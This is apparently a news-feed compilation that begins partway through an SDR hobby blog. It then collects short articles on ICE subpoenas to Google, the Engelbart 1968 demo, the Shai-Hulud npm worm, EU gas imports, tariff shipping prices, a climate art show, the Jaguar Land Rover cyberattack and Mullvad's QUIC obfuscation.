We’ve been over this. Not allowed in Germany. Don’t do it. ⛔
But in the US, anyone can purchase a marine radio, and even use it to transmit! :D
50: Go mobile!
Just now, I was wondering whether there are any Android apps for controlling SDRs.
And it turned out that the software I liked best that week, SDR++, has had an Android version for a couple of weeks now! \o/
So now I could go track down the source of some of these strange signals! :3
Looking back
And with that, … 🥁 … I was officially done with my “50 things to do with a software defined radio”! 🎉
These were seven very intense days, in which I learned a lot of new things about radio waves and the many things they can be used for!
I was proud! I was tired! I was amazed that all those things I received are all around us, everywhere, all at once – if you know where to look. :O
More things to explore
Here are some things that I haven’t tried or that haven’t worked:
Receiving digital voice modes (SDRangel should be able to do it, but I couldn’t figure it out)
Receive something from the ISS
Use the GRAVES radar to detect meteors (couldn’t detect it)
Receive videos on ham bands
Receive Iridium satellites
Listen to pirate stations
Receive Cubesat
Also, doing things with Wi-Fi/Bluetooth/Zigbee could be fun, but I’d need a more expensive receiver for those frequencies.
Future thoughts
So, was this project in fact a gateway drug to getting an amateur radio license?
Yeah, probably. I’d love to transmit something and experiment more! :D
In Germany, a new license class will be introduced in summer 2024 that’ll allow you to transmit on the 10-meter, 2-meter and 70-cm bands (the “N class”).
In fact, there’s a really good German online course that teaches you everything you need to know: 50ohm.de. Highly recommended, even if you’re not planning on getting a license.
Finally, thanks to Piko, Chris, and Cqoicebordel for proof-reading this blog post! <3
Google Secretly Handed ICE Data About Pro-Palestine Student Activist
Intercept
theintercept.com
2025-09-16 15:24:37
Google handed over Gmail account information to ICE before notifying the student or giving him an opportunity to challenge the subpoena.
Even before immigration authorities began rounding up international students who had spoken out about Israel’s war on Gaza earlier this spring, there was a sense of fear among campus activists. Two graduate students at Cornell University — Momodou Taal and Amandla Thomas-Johnson — were so worried they would be targeted that they fled their dorms to lay low in a house outside Ithaca, New York.
As they feared, Homeland Security Investigations, the intelligence division of U.S. Immigration and Customs Enforcement, was intent on tracking them both down. As agents scrambled to find Taal and Thomas-Johnson, HSI sent subpoenas to Google and Meta for sensitive information about their Gmail, Facebook, and Instagram accounts.
In Thomas-Johnson’s case, The Intercept found, Google handed over data to ICE before notifying him or giving him an opportunity to challenge the subpoena. By the time he found out about the data demand, Thomas-Johnson had already left the U.S.
During the first Trump administration, tech companies publicly fought federal subpoenas on behalf of their users who were targeted for protected speech — sometimes with great fanfare. With ICE ramping up its use of dragnet tools to meet its deportation quotas and smoke out noncitizens who protest Israel’s war on Gaza, Silicon Valley’s willingness to accommodate these kinds of subpoenas puts those who speak out at greater risk.
Lindsay Nash, a professor at Cardozo School of Law in New York who has studied ICE’s use of administrative subpoenas, said she was concerned but not surprised that Google complied with the subpoena about Thomas-Johnson’s account without notifying him.
“Subpoenas can easily be used and the person never knows,” Nash told The Intercept. “It’s problematic to have a situation in which people who are targeted by these subpoenas don’t have an opportunity to vindicate their rights.”
Google declined to discuss the specifics of the subpoenas, but the company said administrative subpoenas like these do not include facts about the underlying investigation.
“Our processes for handling law enforcement subpoenas are designed to protect users’ privacy while meeting our legal obligations,” said a Google spokesperson in an emailed statement. “We review every subpoena and similar order for legal validity, and we push back against those that are overbroad or improper, including objecting to some entirely.”
ICE agents sent the administrative subpoenas to Google and Meta by invoking a broad legal provision that gives immigration officers authority to demand documents “relating to the privilege of any person to enter, reenter, reside in, or pass through the United States.”
One recent study based on ICE records found agents invoke this same provision hundreds of times each year in administrative subpoenas to tech companies. Another study found ICE’s subpoenas to tech companies and other private entities “overwhelmingly sought information that could be used to locate ICE’s targets.”
Unlike search warrants, administrative subpoenas like these do not require a judge’s signature or probable cause of a crime, which means they are ripe for abuse.
HSI had flagged Taal to the State Department following “targeted analysis to substantiate aliens’ alleged engagement of antisemitic activities,” according to an affidavit later filed in court by a high-ranking official. This analysis amounted to a trawl of online articles about Taal’s participation in Gaza protests and run-ins with the Cornell administration. The State Department revoked Taal’s visa, and ICE agents in upstate New York began searching for him.
In mid-March, the week after Mahmoud Khalil was arrested in New York City, Taal sued the Trump administration, seeking an injunction that would have blocked ICE from detaining him too. By this point, he and Thomas-Johnson had both left their campus housing at Cornell and were hiding from ICE in a house 10 miles outside Ithaca.
Two days after Taal filed his suit, still unable to track him down, ICE sent an administrative subpoena to Meta. According to notices Meta emailed to Taal, the subpoena sought information about his Instagram and Facebook accounts. Meta gave Taal 10 days to challenge the subpoena in court before the company would comply and hand over data about his accounts to ICE.
Like Google, Meta declined to discuss the subpoena it received about Taal’s account, referring The Intercept to a webpage about the company’s compliance with data demands.
A week later, HSI sent another administrative subpoena to Google regarding Taal’s Gmail account, according to a notice Google sent him the next day.
“It was a phishing expedition,” Taal said in a text message to The Intercept.
After Taal decided to leave the country and dismissed his lawsuit in April, ICE withdrew its subpoenas for his records.
But on the last day of March, HSI sent yet another subpoena, this one to Google for information about Thomas-Johnson’s Gmail account. Without giving Thomas-Johnson any advance warning or the opportunity to challenge it, Google complied with the subpoena, and only notified him weeks later.
“Google has received and responded to legal process from a Law Enforcement authority compelling the release of information related to your Google Account,” read an email Google sent him in early May.
By this point, Thomas-Johnson had already left the country too. He fled after a friend was detained at the Tampa airport, handed a note with Thomas-Johnson’s name on it, and asked repeatedly about his whereabouts, he told The Intercept.
Thomas-Johnson’s lawyer, who also represented Taal, reached out to an attorney for Google about the demand for his client’s account information.
“Google has already fulfilled this subpoena,” Google’s attorney replied by email, further explaining that Google’s “production consisted of basic subscriber information,” such as the name, address, and phone number associated with the account. Google did not produce “the contents of communications, metadata regarding those communications, or location information,” the company’s attorney wrote.
“This is the extent that they will go to be in support of genocide,” Taal said of the government’s attempts to locate him using subpoenas.
Douglas Engelbart's 1968 "Mother of All Demos" at SRI showcased interactive computing innovations, including the mouse debut, hypertext, real-time editing, and collaborative tools, envisioning augmented human intellect.
STATEMENTS
The Augmented Human Intellect Research Center at Stanford Research Institute has pursued computer systems that enhance intellectual work by providing instant responsiveness to user actions throughout the day.
The demo features a computer mouse that controls a tracking spot on a networked display, allowing seamless interaction with text and graphics.
Users can create and manipulate entities like statements and words, including operations such as copying, moving, and reorganizing content in real-time.
Hypertext linking enables jumping between files, such as connecting a text list to a visual map for contextual information like overdue books.
Shared-screen collaboration allows remote participants to view and point to the same display, with audio coupling for discussion, while reserving primary control to the host.
Video integration permits seeing the collaborator's face during work, enhancing remote teamwork through live feeds from the laboratory.
An upcoming ARPA computer network will connect experimental systems, enabling low-latency responses across distances, like from Cambridge to Menlo Park.
The network aims to provide services for managing information, such as locating available resources, protocols, and documents in a distributed environment.
IDEAS
A computer system alive all day, instantly responsive to every action, could dramatically amplify an intellectual worker's productivity and value creation.
Naming the input device a "mouse" was arbitrary but stuck, highlighting how simple conventions can endure in technological evolution.
Starting projects with a blank digital canvas mirrors traditional paper, but enables immediate entity creation and error correction without physical waste.
Copying and moving groups of statements or words allows fluid reorganization of information, turning chaotic lists into structured outputs like categorized produce.
Hypertext links transform static files into interconnected webs, where pointing to an element reveals layered details, such as a route map tied to tasks.
Collaborative "bug fights" let multiple users argue over content in real-time, with hierarchical control ensuring productive discourse without chaos.
Integrating audio, video, and shared screens creates a virtual blackboard, where control can be passed like handing over chalk in a physical meeting.
Future networks could democratize access to computing power, allowing seamless demos from distant locations like Boston conferences.
Organizing network information—tracking services, protocols, and availability—poses a novel challenge for applying augmented tools to infrastructure itself.
The demo's innovations foreshadow a world where human intellect is augmented not replaced, emphasizing partnership between people and machines.
INSIGHTS
True augmentation of human intellect lies in tools that extend cognitive capabilities seamlessly, turning individual work into collective, networked intelligence without overwhelming the user.
Interactive computing fundamentals, like the mouse and hypertext, reveal that intuitive interfaces can unlock exponential productivity by mimicking natural thought processes.
Collaborative systems with shared views and controls highlight how technology can bridge distances, fostering real-time human connection akin to in-person ideation.
The persistence of simple innovations, such as device naming or basic editing, underscores that foundational user experiences drive long-term technological adoption and evolution.
Envisioning networks as information ecosystems suggests that managing metadata about systems themselves will be as crucial as the systems, enabling scalable human flourishing in digital realms.
QUOTES
"If in your office you as an intellectual worker were supplied with a computer display backed up by a computer that was alive for you all day and was instantly responsive to every action you had how much value could you drive from that."
"I don't know why we call it a mouse sometimes I apologize it started that way and we never did change it."
"This characterizes the way I could sit here and look at a blank piece of paper that's the way I start many projects so with my system that's a good start."
"Yeah that's they call a bug fight so we set up now audio coupling and we're both looking at the same display and that'd be very handy to work we can talk to each other in point."
"I'd like to see you while I'm working on it and we're going to go for a picture down in our laboratory in Menlo Park and pipe it up come in Menlo Park."
HABITS
Begin intellectual projects by loading a blank digital canvas, akin to starting with a blank sheet of paper, to foster initial idea generation.
Use immediate error correction during text input, such as backing up to fix mistakes, to maintain workflow momentum.
Reorganize information dynamically by copying, moving, and grouping elements, like sorting lists into categories for clarity.
Engage in real-time collaboration by pointing and discussing shared displays, reserving primary control while allowing input from others.
Integrate visual and audio cues in remote work, such as viewing a collaborator's face, to enhance interpersonal connection during tasks.
FACTS
The December 9, 1968, demo at SRI introduced the computer mouse publicly for the first time.
Engelbart's team demonstrated hypertext linking, allowing navigation between related files and visuals.
The system featured real-time text editing with multiple windows and flexible view controls on cathode ray tube displays.
Shared-screen teleconferencing was shown with a remote participant in Menlo Park interacting via a less powerful "bug."
The ARPA network, precursor to the internet, was planned to connect about 20 experimental computers within a few years.
REFERENCES
Augmented Human Intellect Research Center at Stanford Research Institute (SRI).
ARPA computer network (experimental, first form in about a year, expanding to 20 computers).
On-Line System (NLS), implied in the demo's text editing and linking tools.
Picture drawing capability for maps and routes in the system.
HOW TO APPLY
Acquire or simulate an interactive display system that responds instantly to inputs, starting with basic mouse-like controls to manipulate digital entities like text.
Begin tasks by creating a blank workspace and inputting initial statements or words, using copy and move commands to build and iterate on ideas rapidly.
Implement hypertext links by associating text elements with external files or visuals, such as linking a task list to a route map for contextual depth.
Set up shared-screen collaboration with audio, designating one user as primary controller while allowing others to point and comment in real-time.
Prepare for networked environments by developing tools to track and organize meta-information, like service availability and protocols, to facilitate distributed work.
ONE-SENTENCE TAKEAWAY
Embrace augmented intellect tools to multiply human productivity through intuitive, collaborative computing interfaces.
RECOMMENDATIONS
Invest in responsive digital tools that mimic natural cognition to boost daily intellectual output.
Prioritize hierarchical controls in collaborative software to enable efficient "bug fights" without conflict.
Build interconnected systems with hypertext to reveal hidden layers of information intuitively.
Integrate multimedia—audio, video, and shared views—for remote work that feels as natural as face-to-face.
Design future networks with built-in information services to streamline access to resources and expertise.
MEMO
In the flickering glow of a cathode ray tube on December 9, 1968, Douglas Engelbart and his team at Stanford Research Institute unveiled a vision that would redefine human-computer interaction. Dubbed the "Mother of All Demos," the presentation introduced the world to the computer mouse—a wooden prototype that guided a tracking spot across the screen with uncanny precision. Engelbart, ever the visionary, demonstrated not just hardware but a philosophy: augmenting human intellect through systems that respond instantly to every keystroke and gesture. He loaded blank digital canvases, manipulated words and statements with copy-paste fluidity, and reorganized chaotic lists into tidy categories, all while pondering aloud, "How much value could you drive from that?" This wasn't mere tinkering; it was a blueprint for intellectual workers empowered by alive, all-day computing.
The demo's magic deepened with collaboration across distances. From Menlo Park, a remote colleague joined via shared screen, their weaker "bug" pointing to Engelbart's text while audio lines crackled with discussion. What ensued was a "bug fight"—a lively argument over content, with Engelbart retaining ultimate control, much like a teacher wielding the chalk. Video feeds soon piped in the collaborator's face, transforming the abstract into the intimate, as if they shared a laboratory blackboard. Engelbart jumped through hypertext links, weaving text to maps: a grocery list bloomed into a route plan, revealing overdue books at the library. These feats foreshadowed networked futures, with the ARPA system on the horizon to link 20 computers, delivering Cambridge-speed responses and meta-services for protocols and papers.
Engelbart's legacy endures in our touchscreen world, reminding us that technology's highest purpose is partnership, not replacement. By organizing information as dynamically as thought itself, his innovations promised—and delivered—a era where human flourishing accelerates through seamless augmentation. The mouse may have started as a whim, but it scurried into history, proving that small inventions can bootstrap vast intellectual leaps.
At least 187 code packages made available through the JavaScript repository NPM have been infected with a self-replicating worm that steals credentials from developers and publishes those secrets on GitHub, experts warn. The malware, which briefly infected multiple code packages from the security vendor CrowdStrike, steals and publishes even more credentials every time an infected package is installed.
The novel malware strain is being dubbed Shai-Hulud — after the name for the giant sandworms in Frank Herbert's Dune novel series — because it publishes any stolen credentials in a new public GitHub repository that includes the name "Shai-Hulud."
"When a developer installs a compromised package, the malware will look for a npm token in the environment," said Charlie Eriksen, a researcher for the Belgian security firm Aikido. "If it finds it, it will modify the 20 most popular packages that the npm token has access to, copying itself into the package, and publishing a new version."
At the center of this developing maelstrom are code libraries available on NPM (short for "Node Package Manager"), which acts as a central hub for JavaScript development and provides the latest updates to widely-used JavaScript components.
The Shai-Hulud worm emerged just days after unknown attackers launched a broad phishing campaign that spoofed NPM and asked developers to "update" their multi-factor authentication login options. That attack led to malware being inserted into at least two-dozen NPM code packages, but the outbreak was quickly contained and was narrowly focused on siphoning cryptocurrency payments.
Image: aikido.dev
In late August, another compromise of an NPM developer resulted in malware being added to "nx," an open-source code development toolkit with as many as six million weekly downloads. In the nx compromise, the attackers introduced code that scoured the user's device for authentication tokens from programmer destinations like GitHub and NPM, as well as SSH and API keys. But instead of sending those stolen credentials to a central server controlled by the attackers, the malicious nx code created a new public repository in the victim's GitHub account, and published the stolen data there for all the world to see and download.
Last month's attack on nx did not self-propagate like a worm, but this Shai-Hulud malware does, and it bundles reconnaissance tools to assist in its spread. Namely, it uses the open-source tool TruffleHog to search for exposed credentials and access tokens on the developer's machine. It then attempts to create new GitHub actions and publish any stolen secrets.
“Once the first person got compromised, there was no stopping it,” Aikido’s Eriksen told KrebsOnSecurity. He said the first NPM package compromised by this worm appears to have been altered on Sept. 14, around 17:58 UTC.
The security-focused code development platform socket.dev reports the Shai-Hulud attack briefly compromised at least 25 NPM code packages managed by CrowdStrike. Socket.dev said the affected packages were quickly removed by the NPM registry.
In a written statement shared with KrebsOnSecurity, CrowdStrike said that after detecting several malicious packages in the public NPM registry, the company swiftly removed them and rotated its keys in public registries.
“These packages are not used in the Falcon sensor, the platform is not impacted and customers remain protected,” the statement reads, referring to the company’s widely-used endpoint threat detection service. “We are working with NPM and conducting a thorough investigation.”
A writeup on the attack from StepSecurity found that for cloud-specific operations, the malware enumerates AWS, Azure and Google Cloud Platform secrets. It also found the entire attack design assumes the victim is working in a Linux or macOS environment, and that it deliberately skips Windows systems.
StepSecurity said Shai-Hulud spreads by using stolen NPM authentication tokens, adding its code to the top 20 packages in the victim’s account.
"This creates a cascading effect where an infected package leads to compromised maintainer credentials, which in turn infects all other packages maintained by that user," StepSecurity's Ashish Kurmi wrote.
Eriksen said Shai-Hulud is still propagating, although its spread seems to have waned in recent hours.
“I still see package versions popping up once in a while, but no new packages have been compromised in the last ~6 hours,” Eriksen said. “But that could change now as the east coast starts working. I would think of this attack as a ‘living’ thing almost, like a virus. Because it can lay dormant for a while, and if just one person is suddenly infected by accident, they could restart the spread. Especially if there’s a super-spreader attack.”
Nicholas Weaver is a researcher with the International Computer Science Institute, a nonprofit in Berkeley, Calif. Weaver called the Shai-Hulud worm "a supply chain attack that conducts a supply chain attack." Weaver said NPM (and all other similar package repositories) need to immediately switch to a publication model that requires explicit human consent for every publication request using a phish-proof 2FA method.
“Anything less means attacks like this are going to continue and become far more common, but switching to a 2FA method would effectively throttle these attacks before they can spread,” Weaver said. “Allowing purely automated processes to update the published packages is now a proven recipe for disaster.”
Team-Wide VMware Certification: Your Secret Weapon for Security
Bleeping Computer
www.bleepingcomputer.com
2025-09-16 15:01:11
One VMware-certified pro is a win. An entire certified team? That's a security multiplier. VMUG Advantage makes team-wide certification practical—building collaboration, resilience, and retention. [...]...
When one person on your IT team is VMware certified, that’s a win.
But when your entire team is certified? That’s a force multiplier for innovation, retention, and your security posture.
Organizations that invest in team-wide certification build high-performing environments that are more collaborative, secure, and future-ready. The result: smoother rollouts, fewer errors, faster incident response, and a workforce that's confident, capable, and committed.
Certification Is a Security Strategy
It’s easy to think of certifications as personal goals, but leading organizations see them as an investment with real business outcomes.
Certified teams:
Share a common language for architecture and design
Understand how to properly configure and harden virtual environments
Minimize misconfigurations, a leading cause of security incidents
Quickly identify and remediate vulnerabilities before they escalate
VMware certifications cover a broad portfolio of products critical to modern infrastructure, including vSphere, NSX, vSAN, and VMware Cloud Foundation. With certification, your team doesn't just learn how to deploy them; they learn how to do it securely and at scale.
Why vSphere Expertise Matters for Security
Among VMware’s offerings,
vSphere
stands out as a cornerstone for both virtualization and security. Beyond consolidating workloads, it equips teams with built-in security tools and practices that can harden infrastructure against threats.
With vSphere certification, IT professionals gain the expertise to:
Enforce role-based access control to prevent privilege creep
Leverage vSphere Trust Authority to validate hosts and ensure a secure chain of trust
Use VM Encryption and secure boot to protect data and workloads
Automate patching with vSphere Lifecycle Manager, reducing exposure to known vulnerabilities
Security isn't bolted onto vSphere; it's woven into the platform. Certification ensures your team not only knows these features exist but knows how to implement them effectively.
Certification as Leadership Development
“My effectiveness as a leader comes from having walked the walk.”
— Tamecka McKay, VMUG Board Director
Tamecka McKay's career journey from learning ESX 3.5 to leading enterprise infrastructure illustrates the transformative power of community and certification. For McKay, certifications aren't just personal wins; they're tools that elevate entire teams.
She emphasizes that security and trust start with capability:
“When your team is trained and confident in VMware’s platforms, you’re prepared to build secure, trusted infrastructure. Certification creates that confidence and competence.”
For organizations aiming to grow secure leaders from within, team-wide VMware certification is a foundational step.
A Talent Retention Strategy That Actually Works
In today's competitive IT landscape, professional growth is one of the top reasons employees stay or leave. Offering VMware certification shows your team you're invested in their future and gives them meaningful, marketable skills, which leads to:
Higher job satisfaction
Stronger team loyalty
Lower turnover and recruitment costs
And when employees feel empowered, your entire organization benefits.
Scale Smart with VMUG Advantage
Scaling certification across an entire IT team doesn't have to be cost-prohibitive. VMUG Advantage makes it practical and affordable with group licensing and volume discounts that include:
Hands-on labs for practicing secure deployments
Exam vouchers to streamline the certification process
Personal-use licenses for real-world testing
Access to a community of VMware experts for ongoing mentorship
EU Energy Commissioner Dan Jorgensen met US Energy Secretary Chris Wright in Brussels on 11 September.
Following her State of the European Union address to the European Parliament last week, EU Commission President Ursula von der Leyen got an earful from MEPs angry about her "surrender deal" with Donald Trump. Iratxe Garcia Perez, leader of the centre-left S&D group, blasted von der Leyen's hypocrisy in calling for Europe to have courage and fight when she herself showed no courage with Trump. "You went to Scotland to bury Europe's strategic autonomy under a golf course," she told her.
Green group leader Bas Eickhout questioned how she could say in her speech that she still cares deeply about climate change, even as she and her EPP group have spent the first ten months of her second term dismantling some of the climate legislation she passed in her first term. "You said we need to be energy independent, but at the same time you sign a Trump deal that promises a $750 billion investment in American [LNG] energy that is dirtier than what we had before. That to replace the Russian LNG gas that is only $10 billion per year for now. These numbers don't add up…We should invest this money in European renewables and European industry, because renewables are the worst enemy of fossil autocrats."
The Commission has defended President von der Leyen's promise to invest $250 billion per year in US liquified natural gas (LNG) for the remainder of Trump's term (something analysts say isn't possible to fully deliver) by saying it is just a temporary measure until this can be replaced by renewables in the next decade. But energy analysts have pointed out that building the infrastructure needed to receive the American LNG will lock Europe into long-term dependence. Last week, US Energy Secretary Chris Wright said in an interview with Euractiv that this is exactly the point.
Contradicting the Commission's claims that this use of US LNG will be a "short-term measure," Wright told Euractiv that it is in fact a "long-term change." "When you buy energy, particularly liquefied natural gas, there's a huge amount of infrastructure that's built," he said. "This isn't going to be three and a half years and it'll all be over."
It's an important distinction because it will only be possible for the EU to meet its targets of reducing emissions by 55% by 2030 and reaching net zero by 2050 if the use of US LNG is short term. But Wright is right: it doesn't make sense that Europe would build all of the expensive infrastructure necessary to receive US LNG at its ports and then just stop using it a few years later.
Wright, who was on a visit to Brussels to plan the fossil-fuel-dumping bonanza with EU lawmakers, also dismissed analysts’ claims that the US will not be able to deliver this amount of LNG over the next three years. “During the Trump administration the capacity for the United States to export LNG will double, not increase by 10 or 20 percent,” Wright told Euractiv.
At the time of Russia's invasion of Ukraine, when the EU urgently switched from importing Russian pipeline gas to importing liquified gas from the US and other suppliers, most US export terminals and EU import terminals were operating at maximum capacity, and those that weren't didn't have the pipeline infrastructure to get the gas to where it needed to go. New port terminals and pipelines have been rapidly built after President von der Leyen agreed with President Biden in 2022 to immediately redirect 15 billion cubic metres (bcm) of US LNG to the EU to help replace the 100bcm of Russian gas the EU stopped importing. That was successfully done. But the plan also called for scaling this up to 50bcm of US LNG per year starting in 2023. That hasn't happened, for two reasons: the needed export and import infrastructure takes time to build, and market interest has been limited because EU gas demand has actually fallen recently.
To receive more US LNG, the US needs to build liquefaction export terminals, and the EU needs to build regasification import terminals and pipelines at either end to get the gas to and from where it needs to go. So the problem is that, by their very nature, a surge of LNG imports cannot be temporary. Receiving them will require a huge amount of expensive port and pipeline infrastructure to be built, and once it's built it needs to continue to be used for decades in order to justify the investment. In other words, US LNG can't be short term; it can only be long term.
"A big LNG import terminal takes around five years to build and come online," Simon Dekeyrel, a climate and energy analyst at the European Policy Centre, told me in 2022. The pipelines connecting that terminal also take several years to build – well beyond the short-term urgency of replacing Russian gas imports. "What we're seeing right now is a flurry of new announced projects across EU member states. Germany has announced two LNG import terminals. Italy is also considering a new terminal. It's a huge rush…which might really lead to unnecessary investments in fossil fuel infrastructure which would be much better spent elsewhere."
The deal's defenders have insisted that this is an empty promise that can't actually be delivered, so it's harmless. But the US government has made it clear they don't see this as a mere symbolic tribute that doesn't require delivery. They have said that if the EU doesn't start coughing up the big bucks right away, then the deal limiting tariffs to 15% is off. Europe has to at least start building the infrastructure necessary to receive the US gas, or risk Trump's wrath.
The argument by the deal's defenders that this investment is necessary to wean Europe off of Russian energy also doesn't hold water, because Europe has already done so (there is only a little importing still going on, which must be phased out by 2027). A report by the Brussels think tank Bruegel has found that Europe doesn't need the US gas it has committed to buying.
The EU's faster-than-expected switch to renewables has meant that gas demand is going down. In 2024, overall LNG imports to the EU (of which the US makes up 50%) declined compared to the previous year, which left some of the European regasification terminals that have been quickly built in Germany since 2022 underutilised for the first time. Warmer winters due to climate change and the surge in new renewables meant the LNG wasn't needed.
Europeans can see how the US government is weaponising Europe's dependencies at the moment. Von der Leyen even obliquely referenced it in her State of the Union speech. Why then would Europeans be so quick to increase their dependence on the US when it comes to energy? Were no lessons learned about the over-reliance on Russian energy over the past two decades? In five years, after spending billions on port terminals and pipelines to receive US gas and dropping investment in renewables, the EU could find itself far more dependent on American energy than it ever was on Russian energy.
The EU is backing away from its Green Deal, as concerns over near-term security threats overshadow the long-term threat of climate change. But some argue today's reframing will help climate efforts.
Another npm supply-chain attack
Linux Weekly News
lwn.net
2025-09-16 14:51:53
The Socket.dev blog describes this week's attack on JavaScript packages in the npm repository.
A malicious update to @ctrl/tinycolor (2.2M weekly downloads) was detected on npm as part of a broader supply chain attack that impacted more than 40 packages spanning multiple maintainers. The compromised versions include a function (NpmModule.updatePackage) that downloads a package tarball, modifies package.json, injects a local script (bundle.js), repacks the archive, and republishes it, enabling automatic trojanization of downstream packages.
Security updates for Tuesday
Linux Weekly News
lwn.net
2025-09-16 14:36:12
Security updates have been issued by AlmaLinux (kernel and kernel-rt), Debian (node-sha.js and python-django), Fedora (chromium, cups, exiv2, perl-Catalyst-Authentication-Credential-HTTP, perl-Catalyst-Plugin-Session, perl-Plack-Middleware-Session, and qemu), Red Hat (container-tools:rhel8, podman, ...
Some international sellers on large platforms like eBay and Etsy have jacked up their shipping costs to the United States to absurd prices in order to deter Americans from buying their products, in an effort to avoid dealing with the logistical headaches of Trump's tariffs.
A Japanese eBay seller increased the shipping cost on a $319 Olympus camera lens to $2,000 for U.S. buyers, for example. The shipping price from Japan to the United Kingdom, Italy, Ireland, Costa Rica, Canada, and other countries I checked is $29, meanwhile. The seller, Ninjacamera.Japan, recently updated their shipping prices to the United States to all be $2,000 for dozens of products that don't weigh very much and whose prices are mostly less than $800. That price used to be the threshold for the de minimis tariff exemption, a rule that previously allowed people to buy lower-priced goods without paying tariffs.
As many hobbyists have recently discovered, the end of de minimis has made things more expensive and harder to come by.
eBay does allow sellers to opt out of selling to the United States entirely, but some sellers have found it easier to modify existing listings to have absurd shipping prices for the United States only, rather than take entire listings down to restrict American buyers.
I found numerous listings from a handful of different sellers who, rather than say they won't ship to the United States, have simply jacked up their shipping costs to absurd levels for the United States only. There are $575 cameras that the seller is now charging $500 to ship to the United States but will mail for free anywhere else in the world. Another Japanese seller is charging $640 to mail to the United States but will ship for free to other countries. A seller in Kazakhstan is charging $35 to mail a camera internationally but $999 to send to the United States. A German yarn seller is charging $10.50 to ship to Canada, but $500 to ship to the United States.
On Reddit, users are reporting the same phenomenon occurring with some sellers on Etsy as well (it is harder to search Etsy by shipping prices, so I couldn't find too many examples of this).
What is happening here, of course, is that some sellers in other countries don't want to have to deal with Trump's tariffs and the complicated logistics they have created for both buyers and sellers. Many international shipping companies have entirely stopped shipping to the United States, and many international sellers don't want to have to deal with the hassle of changing whatever shipping service they normally use to accommodate American buyers. eBay has also warned sellers that they may get negative feedback from American buyers who do not understand how tariffs work. eBay's feedback system is very important, and just a few negative reviews can impact a seller's standing on the platform and make it less likely that buyers will purchase something from them.
None of this is terribly surprising, but as an American, it actually feels more painful to see a listing for a product I might want that costs $2,000 to ship than to have the listings be invisible to me altogether.
About the author
Jason is a cofounder of 404 Media. He was previously the editor-in-chief of Motherboard. He loves the Freedom of Information Act and surfing.
Morning Spew: Go to Red Hook to Heckle Some Oil and Gas Execs
Have you been listening to the Hell Gate Podcast? You can catch last week's episode here.
At the multidisciplinary Red Hook art space Pioneer Works last Friday evening, guests mingled as they viewed the new installations that will adorn the space for the rest of the year. The Mexican artist Raúl de Nieves's towering stained glass windows make the former iron factory feel like a kind of hippie church, but the bulk of what's on display is the exhibit "How To Get To Zero"—the first survey of the past half-decade of work from long-time collaborators Australian enviro-artist Tega Brain and New York City-based hacker-artist Sam Lavigne. One of the pieces is a video installation for "Coppelganger," which allows you to find the NYPD officer you look most like, a gamified reversal of ubiquitous surveillance; another is a matrix of bots hosted on a bunch of old, plugged-in smartphones, fixed to the wall and operating on their own, all running up the pageviews on climate news coverage. The overall effect is a pleasant feeling that you're hacking into the mainframe, finding glimpses of political possibility that both defy and sometimes reinforce the conventional wisdom that "we're so cooked."
But the main highlight is "Offset," Brain and Lavigne's new, (sort of) satirical send-up of the idea of carbon offsets, the measly market-based answer to the generational problems presented by climate change. On a website built for "Offset," Lavigne and Brain offer visitors the chance to buy $150 certificates that would, in a roundabout way, cancel out carbon emissions by donating to activists who have been undertaking acts of sabotage against oil and gas infrastructure projects such as the Dakota Access Pipeline (included in the "marketplace" of industrial sabotage efforts is also the killing of UnitedHealthcare CEO Brian Thompson).
The in-person component of "Offset" is akin to a call center combined with an alternate reality game, where you can get on a leaderboard by logging the longest calls made to oil and gas executives, reducing your own private carbon footprint by, well, being annoying. It was a good way to spend an evening.
Hell Gate spoke to Lavigne about "Offset," which forms the centerpiece of his and Brain's contributions to the new Pioneer Works season.
This interview has been lightly edited and condensed for clarity.
Jaguar Land Rover extends shutdown after cyberattack by another week
Bleeping Computer
www.bleepingcomputer.com
2025-09-16 14:08:16
Jaguar Land Rover (JLR) announced today that it will extend the production shutdown for another week, following a devastating cyberattack that impacted its systems at the end of August.
JLR is a standalone entity under Tata Motors India, following its acquisition from Ford in 2008. JLR employs approximately 39,000 people, makes more than 400,000 vehicles each year, and has reported an annual revenue of over $38 billion (£29 billion).
The British automaker has been working to resume operations since it disclosed the attack on September 2, stating that its production had been significantly disrupted. Last week, JLR also confirmed that the attackers stole "some data" during the breach and instructed staff not to report to work.
Earlier today, the automotive giant announced that it's still working to restart its operations and that production will not resume until next week.
"Today we have informed colleagues, suppliers and partners that we have extended the current pause in our production until Wednesday 24th September 2025,"
JLR said
.
"We have taken this decision as our forensic investigation of the cyber incident continues, and as we consider the different stages of the controlled restart of our global operations, which will take time."
JLR has yet to reply to a request for comment from BleepingComputer regarding the incident and its potential impact on customers.
While the automaker confirmed the threat actors stole information from its network, it has yet to attribute the breach to a specific cybercrime group, and no known ransomware operation has taken responsibility for the attack.
However, a group of cybercriminals identifying as "Scattered Lapsus$ Hunters" has taken responsibility for the cyberattack, posting screenshots of an internal JLR SAP system on a Telegram channel and stating that they've also deployed ransomware on the company's compromised systems.
This cybercrime group claims to consist of cybercriminals associated with the Scattered Spider, Lapsus$, and ShinyHunters extortion groups. Scattered Lapsus$ Hunters also claimed responsibility for recent Salesforce data theft attacks.
Mullvad has begun rolling out a new feature that hides WireGuard connections inside QUIC traffic, a technique designed to help users slip past aggressive censorship systems.
By making VPN traffic look more like ordinary encrypted browsing, the update gives people in tightly controlled regions, including Russia and China, a better chance of maintaining stable access to the internet.
It also helps with accessing websites that are increasingly trying to ban VPNs.
The addition comes as Mullvad prepares to move away from OpenVPN, which it will no longer support starting January 2026.
With that change on the horizon, the company is putting its weight behind WireGuard while also making sure it remains usable in countries where standard WireGuard connections are heavily throttled or blocked.
QUIC itself is not new. Originally created by Google and now the backbone of HTTP/3, the protocol is prized for its speed, ability to handle multiple streams of data at once, and resilience against network issues.
Services like YouTube already rely on it, making QUIC traffic extremely common. Mullvad takes advantage of that by wrapping WireGuard’s UDP packets inside QUIC, effectively disguising VPN usage as something indistinguishable from normal web activity.
To make this possible, Mullvad has turned to MASQUE, a standard that allows UDP traffic to be tunneled through HTTP/3 connections.
The result is traffic that appears identical to everyday browsing, far harder for censors to single out and shut down.
The feature is included in Mullvad’s desktop apps for Windows and macOS beginning with version 2025.9.
Users can activate it in the VPN settings, though if multiple connection attempts fail, the client will automatically switch over to QUIC on its own. Support for Android and iOS devices is also planned.
Different VPN companies are taking different routes to achieve similar goals. Proton VPN relies on its Stealth protocol, which disguises WireGuard traffic inside TLS.
NordVPN recently introduced NordWhisper, its own censorship-resistant system. Meanwhile, Surfshark scrambles OpenVPN packets through its Camouflage mode, and ExpressVPN has long integrated obfuscation directly into its OpenVPN connections.
